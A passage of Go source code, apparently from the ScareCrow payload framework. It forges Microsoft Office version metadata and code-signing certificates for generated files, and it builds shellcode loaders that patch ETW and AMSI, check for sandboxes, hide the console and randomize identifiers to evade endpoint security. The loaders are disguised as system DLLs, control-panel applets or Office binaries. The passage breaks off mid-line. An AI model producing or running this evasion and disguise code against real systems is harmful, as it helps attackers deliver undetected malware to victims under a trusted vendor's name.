vi.FixedFileInfo.FileVersion.Major = 16 1039 | vi.FixedFileInfo.FileVersion.Minor = 0 1040 | vi.FixedFileInfo.FileVersion.Patch = 10001 1041 | vi.FixedFileInfo.FileVersion.Build = 10000 1042 | vi.StringFileInfo.InternalName = "Reports.xll" 1043 | } 1044 | if name == "Zoom" { 1045 | vi.StringFileInfo.InternalName = "Zoom.xll" 1046 | vi.StringFileInfo.FileDescription = "Zoom Addon ToolPak" 1047 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1048 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1049 | vi.StringFileInfo.OriginalFilename = "Zoom.xll" 1050 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1051 | vi.FixedFileInfo.ProductVersion.Major = 16 1052 | vi.FixedFileInfo.ProductVersion.Minor = 0 1053 | vi.StringFileInfo.ProductName = "Microsoft Office" 1054 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1055 | vi.FixedFileInfo.FileVersion.Major = 16 1056 | vi.FixedFileInfo.FileVersion.Minor = 0 1057 | vi.FixedFileInfo.FileVersion.Patch = 10001 1058 | vi.FixedFileInfo.FileVersion.Build = 10000 1059 | vi.StringFileInfo.InternalName = "Zoom.xll" 1060 | } 1061 | if name == "Updates" { 1062 | vi.StringFileInfo.InternalName = "Updates.xll " 1063 | vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak" 1064 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1065 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1066 | vi.StringFileInfo.OriginalFilename = "Updates.xll" 1067 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1068 | vi.FixedFileInfo.ProductVersion.Major = 16 1069 | vi.FixedFileInfo.ProductVersion.Minor = 0 1070 | vi.StringFileInfo.ProductName = "Microsoft Office" 1071 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1072 | vi.FixedFileInfo.FileVersion.Major = 16 1073 | vi.FixedFileInfo.FileVersion.Minor = 0 1074 | vi.FixedFileInfo.FileVersion.Patch = 10001 1075 | vi.FixedFileInfo.FileVersion.Build = 10000 1076 | vi.StringFileInfo.InternalName = "Updates.xll" 1077 | } 1078 | 1079 | if name == "Calendar" { 1080 | vi.StringFileInfo.InternalName = "Calendar.xll " 1081 | vi.StringFileInfo.FileDescription = "Calendar ToolPak" 1082 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1083 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1084 | vi.StringFileInfo.OriginalFilename = "Calendar.xll" 1085 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1086 | vi.FixedFileInfo.ProductVersion.Major = 16 1087 | vi.FixedFileInfo.ProductVersion.Minor = 0 1088 | vi.StringFileInfo.ProductName = "Microsoft Office" 1089 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1090 | vi.FixedFileInfo.FileVersion.Major = 16 1091 | vi.FixedFileInfo.FileVersion.Minor = 0 1092 | vi.FixedFileInfo.FileVersion.Patch = 10001 1093 | vi.FixedFileInfo.FileVersion.Build = 10000 1094 | vi.StringFileInfo.InternalName = "Calendar.xll" 1095 | } 1096 | if name == "Memo" { 1097 | vi.StringFileInfo.InternalName = "Memo.xll " 1098 | vi.StringFileInfo.FileDescription = "Memo ToolPak" 1099 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1100 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1101 | vi.StringFileInfo.OriginalFilename = "Memo.xll" 1102 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1103 | vi.FixedFileInfo.ProductVersion.Major = 16 1104 | vi.FixedFileInfo.ProductVersion.Minor = 0 1105 | vi.StringFileInfo.ProductName = "Microsoft Office" 1106 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1107 | vi.FixedFileInfo.FileVersion.Major = 16 1108 | vi.FixedFileInfo.FileVersion.Minor = 0 1109 | vi.FixedFileInfo.FileVersion.Patch = 10001 1110 | vi.FixedFileInfo.FileVersion.Build = 10000 1111 | vi.StringFileInfo.InternalName = "Memo.xll" 1112 | } 1113 | if name == "Desk" { 1114 | vi.StringFileInfo.InternalName = "Desk.xll " 1115 | vi.StringFileInfo.FileDescription = "Office Desktop ToolPak" 1116 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1117 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1118 | vi.StringFileInfo.OriginalFilename = "Desk.xll" 1119 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1120 | vi.FixedFileInfo.ProductVersion.Major = 16 1121 | vi.FixedFileInfo.ProductVersion.Minor = 0 1122 | vi.StringFileInfo.ProductName = "Microsoft Office" 1123 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1124 | vi.FixedFileInfo.FileVersion.Major = 16 1125 | vi.FixedFileInfo.FileVersion.Minor = 0 1126 | vi.FixedFileInfo.FileVersion.Patch = 10001 1127 | vi.FixedFileInfo.FileVersion.Build = 10000 1128 | vi.StringFileInfo.InternalName = "Desk.xll" 1129 | } 1130 | 1131 | if name == "Appwiz" { 1132 | vi.StringFileInfo.InternalName = "Appwiz.xll " 1133 | vi.StringFileInfo.FileDescription = "Application Installer ToolPak" 1134 | vi.StringFileInfo.FileVersion = "16.0.10001.10000" 1135 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 1136 | vi.StringFileInfo.OriginalFilename = "Appwiz.xll" 1137 | vi.FixedFileInfo.ProductVersion.Patch = 10001 1138 | vi.FixedFileInfo.ProductVersion.Major = 16 1139 | vi.FixedFileInfo.ProductVersion.Minor = 0 1140 | vi.StringFileInfo.ProductName = "Microsoft Office" 1141 | vi.StringFileInfo.ProductVersion = "16.0.10001.10000" 1142 | vi.FixedFileInfo.FileVersion.Major = 16 1143 | vi.FixedFileInfo.FileVersion.Minor = 0 1144 | vi.FixedFileInfo.FileVersion.Patch = 10001 1145 | vi.FixedFileInfo.FileVersion.Build = 10000 1146 | vi.StringFileInfo.InternalName = "Appwiz.xll" 1147 | } 1148 | } 1149 | 1150 | vi.Build() 1151 | vi.Walk() 1152 | 1153 | var archs []string 1154 | archs = []string{"amd64"} 1155 | for _, item := range archs { 1156 | fileout := "fart.syso" 1157 | if err := vi.WriteSyso(fileout, item); err != nil { 1158 | log.Printf("Error writing syso: %v", err) 1159 | os.Exit(3) 1160 | } 1161 | } 1162 | fmt.Println("[+] Created Embedded Resource File With " + name + "'s Properties") 1163 | return name 1164 | } 1165 | 1166 | func Signer(domain string, password string, valid string, inputFile string) { 1167 | outFile := inputFile 1168 | 1169 | if valid != "" { 1170 | fmt.Println("[*] Signing " + inputFile + " With a Valid Cert " + valid) 1171 | os.Rename(inputFile, inputFile+".old") 1172 | inputFile = inputFile + ".old" 1173 | SignExecutable(password, valid, inputFile, outFile) 1174 | 1175 | } else { 1176 | password := VarNumberLength(8, 12) 1177 | pfx := domain + ".pfx" 1178 | fmt.Println("[*] Signing " + inputFile + " With a Fake Cert") 1179 | os.Rename(inputFile, inputFile+".old") 1180 | inputFile = inputFile + ".old" 1181 | GenerateCert(domain, inputFile) 1182 | GeneratePFK(password, domain) 1183 | SignExecutable(password, pfx, inputFile, outFile) 1184 | } 1185 | 1186 | os.Remove(domain + ".pem") 1187 | os.Remove(domain + ".key") 1188 | os.Remove(domain + ".pfx") 1189 | fmt.Println("[+] Signed File Created") 1190 | 1191 | } 1192 | -------------------------------------------------------------------------------- /Loader/Loader.go: -------------------------------------------------------------------------------- 1 | package Loader 2 | 3 | import ( 4 | "ScareCrow/Cryptor" 5 | "ScareCrow/Struct" 6 | "ScareCrow/Utils" 7 | "bufio" 8 | "bytes" 9 | "encoding/base64" 10 | "encoding/hex" 11 | "fmt" 12 | "io/ioutil" 13 | "log" 14 | "os" 15 | "strconv" 16 | "strings" 17 | "text/template" 18 | ) 19 | 20 | type Binary struct { 21 | Variables map[string]string 22 | } 23 | 24 | type JScript struct { 25 | Variables map[string]string 26 | } 27 | 28 | type JScriptLoader struct { 29 | Variables map[string]string 30 | } 31 | 32 | type SandboxJScript struct { 33 | Variables map[string]string 34 | } 35 | 36 | type ETW struct { 37 | Variables map[string]string 38 | } 39 | 40 | type AMSI struct { 41 | Variables map[string]string 42 | } 43 | 44 | type Console struct { 45 | Variables map[string]string 46 | } 47 | 48 | type WriteProcessMemory struct { 49 | Variables map[string]string 50 | } 51 | 52 | type Header struct { 53 | Variables map[string]string 54 | } 55 | 56 | type Sandboxfunction struct { 57 | Variables map[string]string 58 | } 59 | type Sandbox_DomainJoined struct { 60 | Variables map[string]string 61 | } 62 | type HTALoader struct { 63 | Variables map[string]string 64 | } 65 | type Macro struct { 66 | Variables map[string]string 67 | } 68 | type Shellcode struct { 69 | Variables map[string]string 70 | } 71 | 72 | type Shellcode_Loader struct { 73 | Variables map[string]string 74 | } 75 | 76 | type Reload struct { 77 | Variables map[string]string 78 | } 79 | 80 | var ( 81 | buffer bytes.Buffer 82 | ) 83 | 84 | func FileName(mode string) (string, string) { 85 | var filename string 86 | var name string 87 | wscript := []string{"APMon", "bisrv", "btpanui", "certcli", "cmdext", "httpapi", "libcrypto", "netlogon", "tcpmon"} 88 | dllname := []string{"apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"} 89 | cplname := []string{"appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"} 90 | officename := []string{"Timesheet", "Reports", "Zoom", "Updates", "Calculator", "Calendar", "Memo", "Desk", "Appwiz"} 91 | Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"} 92 | 93 | if mode == "excel" { 94 | name = officename[Cryptor.GenerateNumer(0, 9)] 95 | filename = name + ".xll" 96 | } 97 | if mode == "control" { 98 | name = cplname[Cryptor.GenerateNumer(0, 20)] 99 | filename = name + ".cpl" 100 | } 101 | if mode == "wscript" { 102 | name = wscript[Cryptor.GenerateNumer(0, 9)] 103 | filename = name + ".dll" 104 | } 105 | 106 | if mode == "dll" { 107 | name = dllname[Cryptor.GenerateNumer(0, 9)] 108 | filename = name + ".dll" 109 | } 110 | 111 | if mode == "msiexec" { 112 | name = dllname[Cryptor.GenerateNumer(0, 9)] 113 | filename = name + ".dll" 114 | } 115 | if mode == "binary" { 116 | name = Binaryname[Cryptor.GenerateNumer(0, 8)] 117 | filename = name + ".exe" 118 | } 119 | return name, filename 120 | } 121 | 122 | func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, string, string) { 123 | var buffer bytes.Buffer 124 | ETW := &ETW{} 125 | ETW.Variables = make(map[string]string) 126 | ETW.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 9) 127 | ETW.Variables["procEtwNotificationRegister"] = Cryptor.VarNumberLength(4, 9) 128 | ETW.Variables["procEtwEventRegister"] = Cryptor.VarNumberLength(4, 9) 129 | ETW.Variables["procEtwEventWriteFull"] = Cryptor.VarNumberLength(4, 9) 130 | ETW.Variables["procEtwEventWrite"] = Cryptor.VarNumberLength(4, 9) 131 | ETW.Variables["WriteProcessMemory"] = WriteProcessMemory 132 | ETW.Variables["ETW"] = Cryptor.VarNumberLength(4, 9) 133 | ETW.Variables["handle"] = Cryptor.VarNumberLength(4, 9) 134 | ETW.Variables["dataAddr"] = Cryptor.VarNumberLength(4, 9) 135 | ETW.Variables["i"] = Cryptor.VarNumberLength(4, 9) 136 | ETW.Variables["data"] = Cryptor.VarNumberLength(4, 9) 137 | ETW.Variables["nLength"] = Cryptor.VarNumberLength(4, 9) 138 | ETW.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) 139 | 140 | ETW.Variables["RemoteETW"] = Cryptor.VarNumberLength(4, 9) 141 | ETW.Variables["decode"] = decode 142 | ETW.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) 143 | ETW.Variables["EtwNotificationRegisterName"] = Utils.StringEncode("EtwNotificationRegister", b64number) 144 | ETW.Variables["EtwEventRegisterName"] = Utils.StringEncode("EtwEventRegister", b64number) 145 | ETW.Variables["EtwEventWriteFullName"] = Utils.StringEncode("EtwEventWriteFull", b64number) 146 | ETW.Variables["EtwEventWriteName"] = Utils.StringEncode("EtwEventWrite", b64number) 147 | 148 | buffer.Reset() 149 | ETWTemplate, err := template.New("ETW").Parse(Struct.ETW_Function()) 150 | if err != nil { 151 | log.Fatal(err) 152 | } 153 | buffer.Reset() 154 | if err := ETWTemplate.Execute(&buffer, ETW); err != nil { 155 | log.Fatal(err) 156 | } 157 | return buffer.String(), ETW.Variables["ETW"], ETW.Variables["RemoteETW"] 158 | } 159 | 160 | func AMSI_Buff(WriteProcessMemory string) (string, string) { 161 | var buffer bytes.Buffer 162 | AMSI := &AMSI{} 163 | AMSI.Variables = make(map[string]string) 164 | AMSI.Variables["AMSI"] = Cryptor.VarNumberLength(4, 9) 165 | AMSI.Variables["WriteProcessMemory"] = WriteProcessMemory 166 | AMSI.Variables["handle"] = Cryptor.VarNumberLength(4, 9) 167 | AMSI.Variables["addr"] = Cryptor.VarNumberLength(4, 9) 168 | AMSI.Variables["ll"] = Cryptor.VarNumberLength(4, 9) 169 | AMSI.Variables["data"] = Cryptor.VarNumberLength(4, 9) 170 | AMSI.Variables["nLength"] = Cryptor.VarNumberLength(4, 9) 171 | AMSI.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) 172 | 173 | buffer.Reset() 174 | AMSITemplate, err := template.New("AMSI").Parse(Struct.AMSI_Function()) 175 | if err != nil { 176 | log.Fatal(err) 177 | } 178 | buffer.Reset() 179 | if err := AMSITemplate.Execute(&buffer, AMSI); err != nil { 180 | log.Fatal(err) 181 | } 182 | return buffer.String(), AMSI.Variables["AMSI"] 183 | } 184 | 185 | func WriteProcessMemory_Buff(number string, b64number int) (string, string, string) { 186 | var buffer bytes.Buffer 187 | WriteProcessMemory := &WriteProcessMemory{} 188 | WriteProcessMemory.Variables = make(map[string]string) 189 | WriteProcessMemory.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 9) 190 | WriteProcessMemory.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 9) 191 | WriteProcessMemory.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) 192 | WriteProcessMemory.Variables["decode"] = Cryptor.VarNumberLength(4, 9) 193 | WriteProcessMemory.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 9) 194 | WriteProcessMemory.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 9) 195 | WriteProcessMemory.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) 196 | WriteProcessMemory.Variables["hProcess"] = Cryptor.VarNumberLength(4, 9) 197 | WriteProcessMemory.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 9) 198 | WriteProcessMemory.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 9) 199 | WriteProcessMemory.Variables["nSize"] = Cryptor.VarNumberLength(4, 9) 200 | WriteProcessMemory.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 9) 201 | 202 | buffer.Reset() 203 | WriteProcessMemoryTemplate, err := template.New("WriteProcessMemory").Parse(Struct.WriteProcessMemory_Function()) 204 | if err != nil { 205 | log.Fatal(err) 206 | } 207 | buffer.Reset() 208 | if err := WriteProcessMemoryTemplate.Execute(&buffer, WriteProcessMemory); err != nil { 209 | log.Fatal(err) 210 | } 211 | return buffer.String(), WriteProcessMemory.Variables["decode"], WriteProcessMemory.Variables["WriteProcessMemory"] 212 | } 213 | 214 | func Imports_Buff(binary bool, console bool, sandbox bool, injection string, evasion string, ETW bool, AMSI bool) string { 215 | var buffer bytes.Buffer 216 | Imports := &Header{} 217 | Imports.Variables = make(map[string]string) 218 | 219 | if binary == false { 220 | Imports.Variables["CPORT"] = `import "C"` 221 | } else { 222 | Imports.Variables["CPORT"] = "" 223 | } 224 | if binary == true || (binary == false && AMSI == false) { 225 | Imports.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` 226 | } else { 227 | Imports.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` 228 | } 229 | if evasion == "KnownDLL" { 230 | Imports.Variables["debugpeimport"] = `filepe "debug/pe"` 231 | Imports.Variables["AdditionalImports"] = `"github.com/Binject/debug/pe" 232 | "github.com/awgh/rawreader"` 233 | Imports.Variables["fmt"] = `"fmt"` 234 | if injection != "" { 235 | Imports.Variables["fmt"] = `"fmt" 236 | "io/ioutil"` 237 | } 238 | } 239 | if evasion == "Disk" { 240 | Imports.Variables["debugpeimport"] = `"debug/pe"` 241 | Imports.Variables["AdditionalImports"] = "" 242 | if binary == false { 243 | Imports.Variables["fmt"] = `"fmt" 244 | "io/ioutil"` 245 | } else { 246 | Imports.Variables["fmt"] = `"fmt" 247 | "io/ioutil"` 248 | } 249 | } 250 | if evasion == "None" { 251 | Imports.Variables["debugpeimport"] = "" 252 | Imports.Variables["AdditionalImports"] = "" 253 | if binary == false { 254 | //temp fix for DLLs with None 255 | Imports.Variables["fmt"] = `"fmt"` 256 | } else { 257 | Imports.Variables["fmt"] = `"fmt"` 258 | } 259 | if injection != "" { 260 | Imports.Variables["fmt"] = `"fmt" 261 | "debug/pe" 262 | "io/ioutil"` 263 | } 264 | } 265 | if binary == true && console == true { 266 | Imports.Variables["DebugImport"] = `"io" 267 | "os"` 268 | } else { 269 | Imports.Variables["DebugImport"] = "" 270 | } 271 | if sandbox == true { 272 | if console == true { 273 | Imports.Variables["SandboxOS"] = "" 274 | } else { 275 | Imports.Variables["SandboxOS"] = `"os"` 276 | } 277 | } else { 278 | Imports.Variables["SandboxOS"] = "" 279 | } 280 | if ETW == false || AMSI == false || injection != "" { 281 | Imports.Variables["HEX_Import"] = `"encoding/hex"` 282 | } else { 283 | Imports.Variables["HEX_Import"] = "" 284 | } 285 | if binary == false && injection == "" { 286 | Imports.Variables["Time_Import"] = "" 287 | } else { 288 | Imports.Variables["Time_Import"] = `"time"` 289 | } 290 | 291 | ImportTemplate, err := template.New("Imports").Parse(Struct.Imports()) 292 | if err != nil { 293 | log.Fatal(err) 294 | } 295 | if err := ImportTemplate.Execute(&buffer, Imports); err != nil { 296 | log.Fatal(err) 297 | } 298 | 299 | return buffer.String() 300 | } 301 | 302 | func Header_Buff(binary bool, AMSI bool, ETW bool, ProcessInjection string, console bool, sandbox bool, evasion string) (string, string, string, string, string, string, string, string, string, string, string, string, string) { 303 | var buffer bytes.Buffer 304 | Header := &Header{} 305 | Header.Variables = make(map[string]string) 306 | Sandboxfunction := &Sandboxfunction{} 307 | Sandboxfunction.Variables = make(map[string]string) 308 | Sandbox_DomainJoined := &Sandbox_DomainJoined{} 309 | Sandbox_DomainJoined.Variables = make(map[string]string) 310 | Console := &Console{} 311 | Console.Variables = make(map[string]string) 312 | 313 | Header.Variables["Imports"] = Imports_Buff(binary, console, sandbox, ProcessInjection, evasion, ETW, AMSI) 314 | 315 | Header.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 9) 316 | Header.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 9) 317 | Header.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 9) 318 | Header.Variables["number"] = Cryptor.VarNumberLength(4, 9) 319 | 320 | Header.Variables["Sandboxfunction"] = Cryptor.VarNumberLength(4, 9) 321 | 322 | Header.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 9) 323 | Header.Variables["k"] = Cryptor.VarNumberLength(4, 9) 324 | Header.Variables["Version"] = Cryptor.VarNumberLength(4, 9) //need to export this 325 | Header.Variables["MV"] = Cryptor.VarNumberLength(4, 9) 326 | Header.Variables["MinV"] = Cryptor.VarNumberLength(4, 9) 327 | Header.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 9) 328 | Header.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 9) 329 | 330 | Header.Variables["decoded"] = Cryptor.VarNumberLength(4, 9) 331 | Header.Variables["b64"] = Cryptor.VarNumberLength(4, 9) 332 | Header.Variables["sum"] = Cryptor.VarNumberLength(4, 9) 333 | Header.Variables["WriteProcessMemory_Function"] = Cryptor.VarNumberLength(4, 9) 334 | Header.Variables["ETW_Function"] = Cryptor.VarNumberLength(4, 9) 335 | Header.Variables["AMSI_Function"] = Cryptor.VarNumberLength(4, 9) 336 | Header.Variables["FindAddress"] = Cryptor.VarNumberLength(4, 9) 337 | b64number := Cryptor.GenerateNumer(3, 6) 338 | Header.Variables["b64number"] = strconv.Itoa(b64number) 339 | 340 | if console == true { 341 | Header.Variables["Debug"] = ` 342 | var ( 343 | debugWriter io.Writer 344 | ) 345 | 346 | func printDebug(format string, v ...interface{}) { 347 | debugWriter = os.Stdout 348 | output := fmt.Sprintf("[DEBUG] ") 349 | output += format +"\n" 350 | fmt.Fprintf(debugWriter, output, v...) 351 | } 352 | ` 353 | } else { 354 | Header.Variables["Debug"] = "" 355 | } 356 | WriteProcessMemory_Function, decode, WriteProcessMemory := WriteProcessMemory_Buff(Header.Variables["b64number"], b64number) 357 | if (ETW == false || AMSI == false) || ProcessInjection != "" { 358 | Header.Variables["decode"] = decode 359 | Header.Variables["WriteProcessMemory_Function"] = WriteProcessMemory_Function 360 | Header.Variables["WriteProcessMemory"] = WriteProcessMemory 361 | } else { 362 | Header.Variables["WriteProcessMemory_Function"] = "" 363 | Header.Variables["decode"] = decode 364 | } 365 | if ETW == false { 366 | ETW_Function, ETW, RemoteETW := ETW_Buff(b64number, Header.Variables["decode"], Header.Variables["WriteProcessMemory"]) 367 | Header.Variables["ETW"] = ETW + "()" 368 | Header.Variables["RemoteETW"] = RemoteETW 369 | Header.Variables["ETW_Function"] = ETW_Function 370 | Header.Variables["B64"] = `"encoding/base64"` 371 | } else { 372 | Header.Variables["ETW"] = "" 373 | Header.Variables["RemoteETW"] = "" 374 | Header.Variables["ETW_Function"] = "" 375 | Header.Variables["B64"] = `` 376 | } 377 | if AMSI == false { 378 | AMSI_Function, AMSI := AMSI_Buff(Header.Variables["WriteProcessMemory"]) 379 | Header.Variables["AMSI_Function"] = AMSI_Function 380 | Header.Variables["AMSI"] = AMSI + "()" 381 | 382 | } else { 383 | Header.Variables["AMSI_Function"] = "" 384 | Header.Variables["AMSI"] = "" 385 | } 386 | if AMSI == false { 387 | AMSI_Function, AMSI := AMSI_Buff(Header.Variables["WriteProcessMemory"]) 388 | Header.Variables["AMSI_Function"] = AMSI_Function 389 | Header.Variables["AMSI"] = AMSI + "()" 390 | 391 | } else { 392 | Header.Variables["AMSI_Function"] = "" 393 | Header.Variables["AMSI"] = "" 394 | } 395 | 396 | if binary == true { 397 | Console.Variables["decode"] = Header.Variables["decode"] 398 | Console.Variables["Console"] = Cryptor.VarNumberLength(10, 19) 399 | Console.Variables["getWin"] = Cryptor.VarNumberLength(10, 19) 400 | Console.Variables["showWin"] = Cryptor.VarNumberLength(10, 19) 401 | Console.Variables["hwnd"] = Cryptor.VarNumberLength(10, 19) 402 | Console.Variables["show"] = Cryptor.VarNumberLength(10, 19) 403 | Console.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(10, 19) 404 | Console.Variables["SW_HIDE"] = Cryptor.VarNumberLength(10, 19) 405 | Console.Variables["GetConsoleWindowName"] = Utils.StringEncode("GetConsoleWindow", b64number) 406 | Console.Variables["ShowWindowName"] = Utils.StringEncode("ShowWindow", b64number) 407 | 408 | ConsoleTemplate, err := template.New("Console").Parse(Struct.Console()) 409 | if err != nil { 410 | log.Fatal(err) 411 | } 412 | if err := ConsoleTemplate.Execute(&buffer, Console); err != nil { 413 | log.Fatal(err) 414 | } 415 | Header.Variables["Console_Function"] = buffer.String() 416 | buffer.Reset() 417 | } else { 418 | Header.Variables["Console_Function"] = "" 419 | } 420 | 421 | if sandbox == true { 422 | Header.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) 423 | Header.Variables["domain"] = Cryptor.VarNumberLength(10, 19) 424 | Header.Variables["status"] = Cryptor.VarNumberLength(10, 19) 425 | SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) 426 | if err != nil { 427 | log.Fatal(err) 428 | } 429 | if err := SandboxFunctionTemplate.Execute(&buffer, Header); err != nil { 430 | log.Fatal(err) 431 | } 432 | Header.Variables["Sandboxfunction"] = buffer.String() 433 | Header.Variables["checker"] = Cryptor.VarNumberLength(10, 19) 434 | Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) 435 | buffer.Reset() 436 | if err != nil { 437 | log.Fatal(err) 438 | } 439 | if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Header); err != nil { 440 | log.Fatal(err) 441 | } 442 | Header.Variables["Sandbox"] = buffer.String() 443 | buffer.Reset() 444 | } else { 445 | Header.Variables["Sandbox"] = "" 446 | Header.Variables["Sandboxfunction"] = "" 447 | Header.Variables["SandboxImport"] = "" 448 | Header.Variables["SandboxOS"] = "" 449 | } 450 | 451 | HeaderTemplate, err := template.New("Header").Parse(Struct.Header()) 452 | if err != nil { 453 | log.Fatal(err) 454 | } 455 | if err := HeaderTemplate.Execute(&buffer, Header); err != nil { 456 | log.Fatal(err) 457 | } 458 | return buffer.String(), Header.Variables["ETW"], Header.Variables["AMSI"], Header.Variables["Versionfunc"], Header.Variables["Version"], Header.Variables["customsyscall"], Header.Variables["customsyscallVP"], Header.Variables["Sandbox"], Console.Variables["Console"], Header.Variables["PROCESS_ALL_ACCESS"], Header.Variables["WriteProcessMemory"], Header.Variables["FindAddress"], Header.Variables["RemoteETW"] 459 | 460 | } 461 | 462 | func Binaryfile(b64ciphertext string, b64key string, b64iv string, mode string, console bool, sandbox bool, name string, ETW bool, ProcessInjection string, Sleep bool, AMSI bool, export string, Exec_Type string, evasion string) (string, string, string) { 463 | var Structure, ReloadCode string 464 | var binary bool 465 | var buffer bytes.Buffer 466 | Binary := &Binary{} 467 | Binary.Variables = make(map[string]string) 468 | Reload := &Reload{} 469 | Reload.Variables = make(map[string]string) 470 | if mode == "binary" { 471 | binary = true 472 | Structure = Struct.Binary() 473 | } else { 474 | binary = false 475 | Structure = Struct.DLL_Refresher() 476 | if mode == "excel" { 477 | Binary.Variables["ExportFunction"] = `` 478 | Binary.Variables["ExportName"] = Struct.JS_Office_Export() 479 | } 480 | if mode == "control" { 481 | Binary.Variables["ExportFunction"] = `` 482 | Binary.Variables["ExportName"] = Struct.JS_Control_Export() 483 | } 484 | if mode == "wscript" || mode == "dll" { 485 | Binary.Variables["ExportFunction"] = `` 486 | Binary.Variables["ExportName"] = Struct.WS_JS_Export() 487 | } 488 | if mode == "dll" && export != "" { 489 | Binary.Variables["ExportFunction"] = `//export ` + export + ` 490 | func ` + export + `() { 491 | Run() 492 | }` 493 | Binary.Variables["ExportName"] = Struct.WS_JS_Export() 494 | } 495 | if mode == "msiexec" { 496 | Binary.Variables["ExportName"] = Struct.WS_JS_Export() 497 | Binary.Variables["ExportFunction"] = `` 498 | } 499 | } 500 | Header, ETWFunctionName, AMSIFunctionName, Versionfunc, Version, customsyscall, customsyscallVP, Sandbox, Console, PROCESS_ALL_ACCESS, WriteProcessMemory, FindAddress, RemoteETWFunctionName := Header_Buff(binary, AMSI, ETW, ProcessInjection, console, sandbox, evasion) 501 | Shellcode_Exec, Shellcode_Exec_Function, Raw_Bin := Shellcode_Loader_Buff(Exec_Type, ProcessInjection, customsyscall, customsyscallVP, PROCESS_ALL_ACCESS, WriteProcessMemory, console, FindAddress, RemoteETWFunctionName) 502 | Binary.Variables["Shellcode_Exec"] = Shellcode_Exec 503 | Binary.Variables["Shellcode_Exec_Function"] = Shellcode_Exec_Function 504 | Binary.Variables["raw_bin"] = Raw_Bin 505 | Binary.Variables["Header"] = Header 506 | Binary.Variables["ETW"] = ETWFunctionName 507 | Binary.Variables["AMSI"] = AMSIFunctionName 508 | Binary.Variables["Versionfunc"] = Versionfunc 509 | Binary.Variables["Version"] = Version 510 | Binary.Variables["customsyscall"] = customsyscall 511 | Binary.Variables["customsyscallVP"] = customsyscallVP 512 | Binary.Variables["Console"] = Console 513 | Binary.Variables["Sandbox"] = Sandbox 514 | Binary.Variables["Reloading"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) + "()" 515 | Binary.Variables["FuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) 516 | 517 | Reload.Variables["customsyscallVP"] = Binary.Variables["customsyscallVP"] 518 | Reload.Variables["customsyscall"] = Binary.Variables["customsyscall"] 519 | Reload.Variables["Reloading"] = Binary.Variables["Reloading"] 520 | Reload.Variables["DLLname"] = Cryptor.VarNumberLength(10, 19) 521 | Reload.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) 522 | Reload.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) 523 | Reload.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) 524 | Reload.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(10, 19) 525 | Reload.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) 526 | Reload.Variables["dll"] = Cryptor.VarNumberLength(10, 19) 527 | Reload.Variables["error"] = Cryptor.VarNumberLength(10, 19) 528 | Reload.Variables["handlez"] = Cryptor.VarNumberLength(10, 19) 529 | Reload.Variables["handle"] = Cryptor.VarNumberLength(10, 19) 530 | Reload.Variables["loaddll"] = Cryptor.VarNumberLength(10, 